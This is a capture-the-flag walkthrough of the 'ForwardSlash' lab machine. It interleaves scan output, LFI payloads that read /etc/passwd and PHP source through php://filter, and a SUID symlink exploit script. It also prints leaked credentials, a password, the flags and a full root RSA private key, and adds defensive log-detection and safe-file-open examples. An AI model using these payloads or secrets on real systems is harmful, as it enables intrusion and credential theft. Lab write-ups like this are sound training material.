FORWARD SLASH WRITEUP

NMAP SCANS

    Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-02 10:20 IST
    NSE: Loaded 151 scripts for scanning.
    NSE: Script Pre-scanning.
    Initiating NSE at 10:20
    Completed NSE at 10:20, 0.00s elapsed
    Initiating NSE at 10:20
    Completed NSE at 10:20, 0.00s elapsed
    Initiating NSE at 10:20
    Completed NSE at 10:20, 0.00s elapsed
    Initiating Ping Scan at 10:20
    Scanning 10.10.10.183 [4 ports]
    Completed Ping Scan at 10:20, 1.04s elapsed (1 total hosts)
    Initiating SYN Stealth Scan at 10:20
    Scanning forwardslash.htb (10.10.10.183) [1000 ports]
    Discovered open port 80/tcp on 10.10.10.183
    Discovered open port 22/tcp on 10.10.10.183
    Completed SYN Stealth Scan at 10:20, 4.20s elapsed (1000 total ports)
    Initiating Service scan at 10:20
    Scanning 2 services on forwardslash.htb (10.10.10.183)
    Completed Service scan at 10:20, 6.66s elapsed (2 services on 1 host)
    Initiating OS detection (try #1) against forwardslash.htb (10.10.10.183)
    Retrying OS detection (try #2) against forwardslash.htb (10.10.10.183)
    Retrying OS detection (try #3) against forwardslash.htb (10.10.10.183)
    Retrying OS detection (try #4) against forwardslash.htb (10.10.10.183)
    Retrying OS detection (try #5) against forwardslash.htb (10.10.10.183)
    Initiating Traceroute at 10:20
    Completed Traceroute at 10:20, 0.38s elapsed
    Initiating Parallel DNS resolution of 2 hosts. at 10:20
    Completed Parallel DNS resolution of 2 hosts. at 10:20, 0.34s elapsed
    NSE: Script scanning 10.10.10.183.
    Initiating NSE at 10:20
    Completed NSE at 10:20, 12.12s elapsed
    Initiating NSE at 10:20
    Completed NSE at 10:20, 2.25s elapsed
    Initiating NSE at 10:20
    Completed NSE at 10:20, 0.00s elapsed
    Nmap scan report for forwardslash.htb (10.10.10.183)
    Host is up (0.22s latency).
    Not shown: 998 closed ports
    PORT   STATE SERVICE VERSION
    22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
    | ssh-hostkey: 
    |   2048 3c:3b:eb:54:96:81:1d:da:d7:96:c7:0f:b4:7e:e1:cf (RSA)
    |   256 f6:b3:5f:a2:59:e3:1e:57:35:36:c3:fe:5e:3d:1f:66 (ECDSA)
    |_  256 1b:de:b8:07:35:e8:18:2c:19:d8:cc:dd:77:9c:f2:5e (ED25519)
    80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
    | http-methods: 
    |_  Supported Methods: GET HEAD POST OPTIONS
    |_http-server-header: Apache/2.4.29 (Ubuntu)
    |_http-title: Backslash Gang
    No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
    TCP/IP fingerprint:
    OS:SCAN(V=7.80%E=4%D=6/2%OT=22%CT=1%CU=40458%PV=Y%DS=2%DC=T%G=Y%TM=5ED5DAB3
    OS:%P=x86_64-pc-linux-gnu)SEQ(SP=102%GCD=1%ISR=108%TI=Z%CI=Z%II=I%TS=A)OPS(
    OS:O1=M54DST11NW7%O2=M54DST11NW7%O3=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST11
    OS:NW7%O6=M54DST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(
    OS:R=Y%DF=Y%T=40%W=FAF0%O=M54DNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS
    OS:%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=
    OS:Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=
    OS:R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T
    OS:=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=
    OS:S)

    Uptime guess: 39.164 days (since Fri Apr 24 06:25:14 2020)
    Network Distance: 2 hops
    TCP Sequence Prediction: Difficulty=258 (Good luck!)
    IP ID Sequence Generation: All zeros
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

    TRACEROUTE (using port 199/tcp)
    HOP RTT       ADDRESS
    1   378.15 ms 10.10.14.1
    2   378.15 ms forwardslash.htb (10.10.10.183)

    NSE: Script Post-scanning.
    Initiating NSE at 10:20
    Completed NSE at 10:20, 0.00s elapsed
    Initiating NSE at 10:20
    Completed NSE at 10:20, 0.00s elapsed
    Initiating NSE at 10:20
    Completed NSE at 10:20, 0.00s elapsed
    Read data files from: /usr/bin/../share/nmap
    OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 47.82 seconds
            Raw packets sent: 1193 (56.566KB) | Rcvd: 1151 (49.594KB)

PORT 80 ENUMERATION

The web root itself has nothing interesting, so let's fuzz it.

Fuzzing turned up a file named note.txt.

After reading that note, I assumed there is a backup site that we can access.

So I tried backupsite.htb, backup.htb and many more, and the one that worked was backup.forwardslash.htb. I added it to the hosts file and accessed it.

I fuzzed the URL and got some pages and a directory:

    root@liquid:~/Desktop/HTB/forwardslash# gobuster dir -u http://backup.forwardslash.htb/ -w /usr/share/wordlists/wfuzz/general/big.txt -x php,txt
    ===============================================================
    Gobuster v3.0.1
    by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
    ===============================================================
    [+] Url:            http://backup.forwardslash.htb/
    [+] Threads:        10
    [+] Wordlist:       /usr/share/wordlists/wfuzz/general/big.txt
    [+] Status codes:   200,204,301,302,307,401,403
    [+] User Agent:     gobuster/3.0.1
    [+] Extensions:     php,txt
    [+] Timeout:        10s
    ===============================================================
    2020/06/02 11:30:44 Starting gobuster
    ===============================================================
    /config.php (Status: 200)
    /dev (Status: 301)
    /index.php (Status: 302)
    /logout.php (Status: 302)
    /login.php (Status: 200)
    Progress: 2184 / 3025 (72.20%)^C
    [!] Keyboard interrupt detected, terminating.
    ===============================================================
    2020/06/02 11:35:00 Finished
    ===============================================================

It has a login page, so I signed up and went on to enumerate more.

I went through every page and found nothing, except that there is a Change Profile Picture page.

There was a URL bar where we can input any URL, so I enabled it. Then, as usual, I tried ../../../../../../etc/passwd

It worked as an LFI.
So first I tried to read the files we found above during fuzzing. We cannot read their source directly, because PHP files get executed when they are included, so they have to be base64-encoded through the php://filter wrapper.

I found interesting things in both files.

Commands used to access those files:

    php://filter/convert.base64-encode/resource=/dev/index.php
    php://filter/convert.base64-encode/resource=config.php
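
From the defender's side, both payloads above leave a clear trace in the web server's access log: a user-controlled parameter carrying a `../` sequence or a `php://` stream wrapper. The following is an added example, not code from the write-up or the box, that scans constructed Apache-style access log lines for exactly those two patterns, decoding percent-encoding repeatedly so double-encoded variants are not missed. The endpoint name `/profilepic.php`, the parameter name `url`, the client addresses and the log lines themselves are all made up for the example.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed sample access-log lines (not taken from the original write-up).
# The endpoint /profilepic.php and its "url" parameter are assumed names.
SAMPLE_LOG = """\
10.10.14.63 - - [02/Jun/2020:07:40:01 +0000] "GET /profilepic.php?url=../../../../../../etc/passwd HTTP/1.1" 200 1312
10.10.14.63 - - [02/Jun/2020:07:41:12 +0000] "GET /profilepic.php?url=php://filter/convert.base64-encode/resource=config.php HTTP/1.1" 200 2044
10.10.14.63 - - [02/Jun/2020:07:42:30 +0000] "GET /profilepic.php?url=%2e%2e%2f%2e%2e%2fetc%2fshadow HTTP/1.1" 403 221
10.10.14.10 - - [02/Jun/2020:07:43:00 +0000] "GET /profilepic.php?url=https://example.com/avatar.png HTTP/1.1" 200 5120
10.10.14.10 - - [02/Jun/2020:07:44:00 +0000] "GET /login.php HTTP/1.1" 200 873
"""

# Common Log Format: client, identity, user, [timestamp], "METHOD target proto", status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# A ".." path component bounded by slashes (or string start/end)
TRAVERSAL_RE = re.compile(r'(^|[\\/])\.\.([\\/]|$)')
# PHP stream wrappers that let an include/fetch read local files or raw data
WRAPPER_RE = re.compile(r'^(php|file|data|phar|expect|zip|glob)://', re.I)


def fully_decode(value, rounds=3):
    """Percent-decode repeatedly so %252e%252e (double-encoded "..") is caught."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify_value(value):
    """Return a finding label for one parameter value, or None if it looks benign."""
    v = fully_decode(value)
    if WRAPPER_RE.match(v):
        return "php-stream-wrapper"
    if TRAVERSAL_RE.search(v):
        return "path-traversal"
    return None


def scan_log(text):
    """Parse each log line and flag any query parameter that carries an LFI pattern."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in Common Log Format
        parts = urlsplit(m.group("target"))
        # parse_qsl already applies one round of percent-decoding
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            reason = classify_value(value)
            if reason:
                findings.append({
                    "ip": m.group("ip"),
                    "path": parts.path,
                    "param": name,
                    "reason": reason,
                    "status": int(m.group("status")),
                })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ip']} {f['path']} {f['param']}={f['reason']} (HTTP {f['status']})")
```

Note that the third constructed line was answered with a 403 and is still reported: for this class of bug the request itself is the signal, and a burst of such requests from one client, regardless of status code, is what should page someone. On the application side the equivalent fix is an allowlist of `http`/`https` for the picture URL rather than a denylist of wrappers.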

config.php

    <?php
    //credentials for the temp db while we recover, had to backup old config, didn't want it getting compromised -pain
    define('DB_SERVER', 'localhost');
    define('DB_USERNAME', 'www-data');
    define('DB_PASSWORD', '5iIwJX0C2nZiIhkLYE7n314VcKNx8uMkxfLvCTz2USGY180ocz3FQuVtdCy3dAgIMK3Y8XFZv9fBi6OwG6OYxoAVnhaQkm7r2ec');
    define('DB_NAME', 'site');
    
    /* Attempt to connect to MySQL database */
    $link = mysqli_connect(DB_SERVER, DB_USERNAME, DB_PASSWORD, DB_NAME);
    
    // Check connection
    if($link === false){
        die("ERROR: Could not connect. " . mysqli_connect_error());
    }
    ?>

/dev/index.php

    <?php
    if ($_SERVER['REQUEST_METHOD'] === "GET" && isset($_GET['xml'])) {

        // Pull an ftp:// URL (up to a closing double quote) out of the xml parameter
        $reg = '/ftp:\/\/[\s\S]*\/\"/';
        //$reg = '/((((25[0-5])|(2[0-4]\d)|([01]?\d?\d)))\.){3}((((25[0-5])|(2[0-4]\d)|([01]?\d?\d))))/'

        if (preg_match($reg, $_GET['xml'], $match)) {
            // "ftp://host/..." split on "/" puts the host in index 2
            $ip = explode('/', $match[0])[2];
            echo $ip;
            error_log("Connecting");

            $conn_id = ftp_connect($ip) or die("Couldn't connect to $ip\n");

            error_log("Logging in");

            // Hard-coded FTP credentials: this is the leak that matters here
            if (@ftp_login($conn_id, "chiv", 'N0bodyL1kesBack/')) {

                error_log("Getting file");
                // ftp_get_string() is not a PHP built-in; presumably defined elsewhere in the file (not shown)
                echo ftp_get_string($conn_id, "debug.txt");
            }

            exit;
        }
    }

chiv : N0bodyL1kesBack/

Here we got a user's password from the files, so let's try it over SSH.

SSH LOGIN

    root@liquid:~/Desktop/HTB/forwardslash# ssh chiv@10.10.10.183
    chiv@10.10.10.183's password:                                          
    Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-91-generic x86_64)

    * Documentation:  https://help.ubuntu.com
    * Management:     https://landscape.canonical.com
    * Support:        https://ubuntu.com/advantage

    System information as of Tue Jun  2 07:43:48 UTC 2020

    System load:  0.08               Processes:            196
    Usage of /:   30.6% of 19.56GB   Users logged in:      2
    Memory usage: 18%                IP address for ens33: 10.10.10.183
    Swap usage:   0%


    * Canonical Livepatch is available for installation.
    - Reduce system reboots and improve kernel security. Activate at:
        https://ubuntu.com/livepatch

    16 packages can be updated.
    0 updates are security updates.

    Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


    Last login: Tue Jun  2 06:17:58 2020 from 10.10.14.63
    chiv@forwardslash:~$ id
    uid=1001(chiv) gid=1001(chiv) groups=1001(chiv)

But we still don't have access to the user flag; for that we need to get the user pain's account.

Enumerating further, we found some backup-related things going on:

a backup binary with the SUID bit set

config.php.bak, readable only by pain

After looking at those, I came to know that we need to deal with the md5sum-of-the-timestamp thing,

and I am not familiar with that, so I asked a friend to help me out.

He gave me the idea of making a bash script to get this working!

Here it is:


    #!/bin/bash
    # Run the SUID backup binary once: its ERROR line names the file it was
    # looking for (the name is derived from the timestamp), so take field 2.
    i=$(backup | grep ERROR | awk '{print $2}')
    # Make that expected name a symlink to the protected config.php.bak.
    ln -s /var/backups/config.php.bak "/home/chiv/$i"
    # Run it again immediately so it reads the backup through the symlink.
    /usr/bin/backup
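
The script above works because the SUID backup program opens whatever the computed name points at, symlink included, and then prints the content. As an added example (not from the write-up or the box), here is how a privileged program can open a user-supplied path defensively in Python: refuse symlinks at open time with `O_NOFOLLOW`, then check type, ownership and link count on the descriptor it actually holds rather than on the path, so there is no check-then-use window to swap the file. The directory, file names and file contents in `demo()` are constructed for the example.

```python
import os
import stat
import tempfile


class UnsafePathError(Exception):
    """Raised when the path does not resolve to a plain file owned by the caller."""


def read_owned_regular_file(path, expected_uid=None):
    """Read `path` only if it is a regular, non-hard-linked file owned by expected_uid.

    The open itself refuses to follow a symlink (O_NOFOLLOW -> ELOOP), and every
    later check is done with fstat() on the open descriptor, not with stat() on
    the path, so the file cannot be swapped between the check and the read.
    """
    if expected_uid is None:
        expected_uid = os.getuid()
    try:
        fd = os.open(path, os.O_RDONLY | os.O_NOFOLLOW | os.O_CLOEXEC)
    except OSError as exc:
        # A symlink at `path` ends up here (ELOOP), as does a missing file.
        raise UnsafePathError(f"refusing {path}: {exc.strerror}") from exc
    try:
        st = os.fstat(fd)
        if not stat.S_ISREG(st.st_mode):
            raise UnsafePathError(f"refusing {path}: not a regular file")
        if st.st_uid != expected_uid:
            raise UnsafePathError(
                f"refusing {path}: owned by uid {st.st_uid}, expected {expected_uid}")
        if st.st_nlink != 1:
            # A hard link to a protected file would pass the symlink check alone.
            raise UnsafePathError(f"refusing {path}: has {st.st_nlink} links")
        with os.fdopen(fd, "rb") as fh:
            fd = -1  # fdopen now owns the descriptor and will close it
            return fh.read()
    finally:
        if fd != -1:
            os.close(fd)


def demo():
    """Constructed scenario: a genuine file, and a symlink aimed at another file."""
    with tempfile.TemporaryDirectory() as d:
        genuine = os.path.join(d, "expected-name")
        with open(genuine, "w") as fh:
            fh.write("genuine backup data\n")

        # Stand-in for the protected config backup (placeholder content).
        protected = os.path.join(d, "config.php.bak")
        with open(protected, "w") as fh:
            fh.write("define('DB_PASSWORD', 'placeholder');\n")

        # The same trick as the script above: the expected name is a symlink.
        link = os.path.join(d, "link-name")
        os.symlink(protected, link)

        results = {"genuine": read_owned_regular_file(genuine).decode()}
        try:
            read_owned_regular_file(link)
            results["symlink"] = "read"
        except UnsafePathError:
            results["symlink"] = "refused"
        return results


if __name__ == "__main__":
    print(demo())
```

The ownership check is the part a SUID binary most often forgets: even with symlinks refused, reading a file that the invoking user merely placed a name for is only safe if that user also owns it. The stronger fix is not to run the helper SUID at all and to let it read only from a directory it owns.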

I created this with his help!

Here we got pain's password:

pain : db1f73a72678e857d91e71d2963a1afa9efbabb32164cc1d94dbc704

Let's grab user.txt:

    pain@forwardslash:~$ cat user.txt 
    59f0c1034a3074b6bc6d87316a118810 

GETTING ROOT ACCESS

    pain@forwardslash:~/encryptorinator$ sudo -l
    Matching Defaults entries for pain on forwardslash:
        env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

    User pain may run the following commands on forwardslash:
        (root) NOPASSWD: /sbin/cryptsetup luksOpen *
        (root) NOPASSWD: /bin/mount /dev/mapper/backup ./mnt/
        (root) NOPASSWD: /bin/umount ./mnt/

This was difficult for me because I don't know crypto scripts, so again I took help and got the password.

I am actually waiting for IppSec's video to understand this part.

So I ran the commands that decrypt the image and expose the decrypted contents as the backup device, which we cannot access directly as it is owned by root, but we can mount it since mount is SUID.

After running these commands I got output like this:

    pain@forwardslash:~/encryptorinator$ sudo /sbin/cryptsetup luksOpen /var/backups/recovery/encrypted_backup.img backup
    Enter passphrase for /var/backups/recovery/encrypted_backup.img: 
    pain@forwardslash:~/encryptorinator$ sudo /bin/mount /dev/mapper/backup ./mnt/
    mount: ./mnt/: mount point does not exist.
    pain@forwardslash:~/encryptorinator$ mkdir mnt
    pain@forwardslash:~/encryptorinator$ sudo /bin/mount /dev/mapper/backup ./mnt/
    pain@forwardslash:~/encryptorinator$ cd mnt/
    pain@forwardslash:~/encryptorinator/mnt$ ls
    id_rsa
    pain@forwardslash:~/encryptorinator/mnt$ cat id_rsa 

    -----BEGIN RSA PRIVATE KEY-----
    MIIEowIBAAKCAQEA9i/r8VGof1vpIV6rhNE9hZfBDd3u6S16uNYqLn+xFgZEQBZK
    RKh+WDykv/gukvUSauxWJndPq3F1Ck0xbcGQu6+1OBYb+fQ0B8raCRjwtwYF4gaf
    yLFcOS111mKmUIB9qR1wDsmKRbtWPPPvgs2ruafgeiHujIEkiUUk9f3WTNqUsPQc
    u2AG//ZCiqKWcWn0CcC2EhWsRQhLOvh3pGfv4gg0Gg/VNNiMPjDAYnr4iVg4XyEu
    NWS2x9PtPasWsWRPLMEPtzLhJOnHE3iVJuTnFFhp2T6CtmZui4TJH3pij6wYYis9
    MqzTmFwNzzx2HKS2tE2ty2c1CcW+F3GS/rn0EQIDAQABAoIBAQCPfjkg7D6xFSpa
    V+rTPH6GeoB9C6mwYeDREYt+lNDsDHUFgbiCMk+KMLa6afcDkzLL/brtKsfWHwhg
    G8Q+u/8XVn/jFAf0deFJ1XOmr9HGbA1LxB6oBLDDZvrzHYbhDzOvOchR5ijhIiNO
    3cPx0t1QFkiiB1sarD9Wf2Xet7iMDArJI94G7yfnfUegtC5y38liJdb2TBXwvIZC
    vROXZiQdmWCPEmwuE0aDj4HqmJvnIx9P4EAcTWuY0LdUU3zZcFgYlXiYT0xg2N1p
    MIrAjjhgrQ3A2kXyxh9pzxsFlvIaSfxAvsL8LQy2Osl+i80WaORykmyFy5rmNLQD
    Ih0cizb9AoGBAP2+PD2nV8y20kF6U0+JlwMG7WbV/rDF6+kVn0M2sfQKiAIUK3Wn
    5YCeGARrMdZr4fidTN7koke02M4enSHEdZRTW2jRXlKfYHqSoVzLggnKVU/eghQs
    V4gv6+cc787HojtuU7Ee66eWj0VSr0PXjFInzdSdmnd93oDZPzwF8QUnAoGBAPhg
    e1VaHG89E4YWNxbfr739t5qPuizPJY7fIBOv9Z0G+P5KCtHJA5uxpELrF3hQjJU8
    6Orz/0C+TxmlTGVOvkQWij4GC9rcOMaP03zXamQTSGNROM+S1I9UUoQBrwe2nQeh
    i2B/AlO4PrOHJtfSXIzsedmDNLoMqO5/n/xAqLAHAoGATnv8CBntt11JFYWvpSdq
    tT38SlWgjK77dEIC2/hb/J8RSItSkfbXrvu3dA5wAOGnqI2HDF5tr35JnR+s/JfW
    woUx/e7cnPO9FMyr6pbr5vlVf/nUBEde37nq3rZ9mlj3XiiW7G8i9thEAm471eEi
    /vpe2QfSkmk1XGdV/svbq/sCgYAZ6FZ1DLUylThYIDEW3bZDJxfjs2JEEkdko7mA
    1DXWb0fBno+KWmFZ+CmeIU+NaTmAx520BEd3xWIS1r8lQhVunLtGxPKvnZD+hToW
    J5IdZjWCxpIadMJfQPhqdJKBR3cRuLQFGLpxaSKBL3PJx1OID5KWMa1qSq/EUOOr
    OENgOQKBgD/mYgPSmbqpNZI0/B+6ua9kQJAH6JS44v+yFkHfNTW0M7UIjU7wkGQw
    ddMNjhpwVZ3//G6UhWSojUScQTERANt8R+J6dR0YfPzHnsDIoRc7IABQmxxygXDo
    ZoYDzlPAlwJmoPQXauRl1CgjlyHrVUTfS0AkQH2ZbqvK5/Metq8o

Here we go with root's id_rsa:

    root@liquid:~/Desktop/HTB/forwardslash# vi id_rsaroot
    root@liquid:~/Desktop/HTB/forwardslash# chmod 600 id_rsaroot 
    root@liquid:~/Desktop/HTB/forwardslash# ssh -i id_rsaroot 10.10.10.183
    Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-91-generic x86_64)

    * Documentation:  https://help.ubuntu.com
    * Management:     https://landscape.canonical.com
    * Support:        https://ubuntu.com/advantage

    System information as of Tue Jun  2 06:55:21 UTC 2020

    System load:  0.05               Processes:            190
    Usage of /:   30.6% of 19.56GB   Users logged in:      1
    Memory usage: 18%                IP address for ens33: 10.10.10.183
    Swap usage:   0%


    * Canonical Livepatch is available for installation.
    - Reduce system reboots and improve kernel security. Activate at:
        https://ubuntu.com/livepatch

    16 packages can be updated.
    0 updates are security updates.

    Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


    Last login: Tue Mar 24 12:11:46 2020 from 10.10.14.3
    root@forwardslash:~# ls
    root.txt
    root@forwardslash:~# cat root.txt 
    e78febc4934fdb81bb3b6fe14ca9dedd

So here we are, done with this machine!

I learnt a lot of things from this machine.

Yes, it was difficult for me, as the crypto part took me the longest.

But I covered the whole of it.

Crypto is still difficult for me and I need to learn more about it.

HOPE YOU LOVE THIS WALKTHROUGH BY LIQUIDRAGE
